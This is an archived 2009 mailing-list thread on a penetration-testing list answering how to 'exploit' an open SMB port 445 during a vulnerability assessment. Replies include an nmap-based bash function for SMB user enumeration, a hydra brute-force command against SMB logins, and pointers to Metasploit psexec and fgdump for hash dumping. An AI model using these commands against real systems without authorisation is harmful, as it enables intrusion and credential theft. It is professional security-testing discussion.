Exploiting IPC$



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I recommend the SuperScan4 thar runs on windows.

http://www.foundstone.com/us/resources/proddesc/superscan.htm

I also use this bash script that runs with Nmap Version 5.00 or later in
backrack.


function nmapenumsmb
{
if [ $# -eq 0 ]
then
echo -e "Sintaxis: nmapenumsmb <IP>"
exit 1
fi

`which nmap` -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.$1 $1
echo Getting users
echo "Login;Type;Domain;RID;Full Name;Description;Flags;Source"
nmap.enum.users.notdisabled.$1.csv
grep -B1 -A6 -e 'Type: User' nmap.enum.$1.nmap | tee
nmap.enum.usuarios.$1.txt \
| tr -d '\n' | sed 's/|\ \ [a-zA-Z0-9]/\n&/g;s/^|\ \
//g;s/|\ \ \ \ |_\ /;/g' | grep -v "Account disabled" \
| sed 's/^|\ \ //g;s/|\ \ \ \ |_\ /;/g;s/:\ /;/g' | cut
- -d\; -f1,3,5,7,9,11,13,15,17 \
| grep \;User\; | tee -a
nmap.enum.users.notdisabled.$1.csv \
| grep -ve '\$'
nmap.enum.users.notdisabled.notmachines.$1.csv
}

You add it to your ~/.bashrc and run it as nmapenumsmb IP and generate
some pretty CSV files with the enumeration information.

Or just nmap -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.IP IP

You can also use Cain from www.toxid.it to make the SID brute force user
enumeration.

Then I use the hydra to test the users for same or null password . It
always works. Then you can use Super Scan to know who's Admin.

hydra -w 10 -V -L lst.users.1.per.line -es -o passwods.hydra.txt IP
smbnt -m GROUP:Domain.com.mx -m D

If you get Admin I recommend Metasploit with the smbpsexec module or
fgdump from foofus to get control/hashes of the machine. Have fun


On Wed, Dec 30, 2009 at 5:38 AM, Halley Souza <souza.halley@xxxxxxxxx>
wrote:
Try nmap scripts smb-enum-shares and smb-brute, always result =)

Halley


2009/12/29 Jerome Athias <jerome.athias@xxxxxxx>

scan/check for administrative shares
Admin$
C$

(you can find a ton of tools for this task)

then you can try a bruteforce attack
https://www.securinfos.info/outils-securite-hacking/ipc$crack.rar
THCHydra
...

RPC/DCOM sploits
Metasploit Framework

G00D L\_/CK
And Happy New Hacking Y3aR!

/JA

Le 28/12/2009 12:11, Himanshu Goyal a écrit :

Hello,

Can somebody share how to exploit port 445. I am doing a VA and found
port 445 open.

When I try to connect IPC$, it says access denied.

Thanks

Cheers-
Himanshu


- ------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification
Review Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.

http://www.iacertification.org

- ------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification
Review Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------




- --
Adrián Puente Z.
[www.hackarandas.com]
Donde las ideas se dispersan en bytes...

"... ruego a mi orgullo que se acompañe siempre de mi prudencia,
y si algún día mi prudencia se echara a volar, que al menos
pueda volar junto con mi locura"
--Nietzche

Huella: FBD6 4C36 2557 C64C 1318 70A8 F561 CB6F 4E40 5AFB
http://www.hackarandas.com/apuente_at_hackarandas.com.asc.gz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAktEFiMACgkQW2tF/eN2yfaeKgCeO7VBfCiOIBKVNk7s3pkbKB+l
KyEAn3rnu6rd1tZTj5LLV6Ap6j8z1crk
=mJ0x
-----END PGP SIGNATURE-----

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------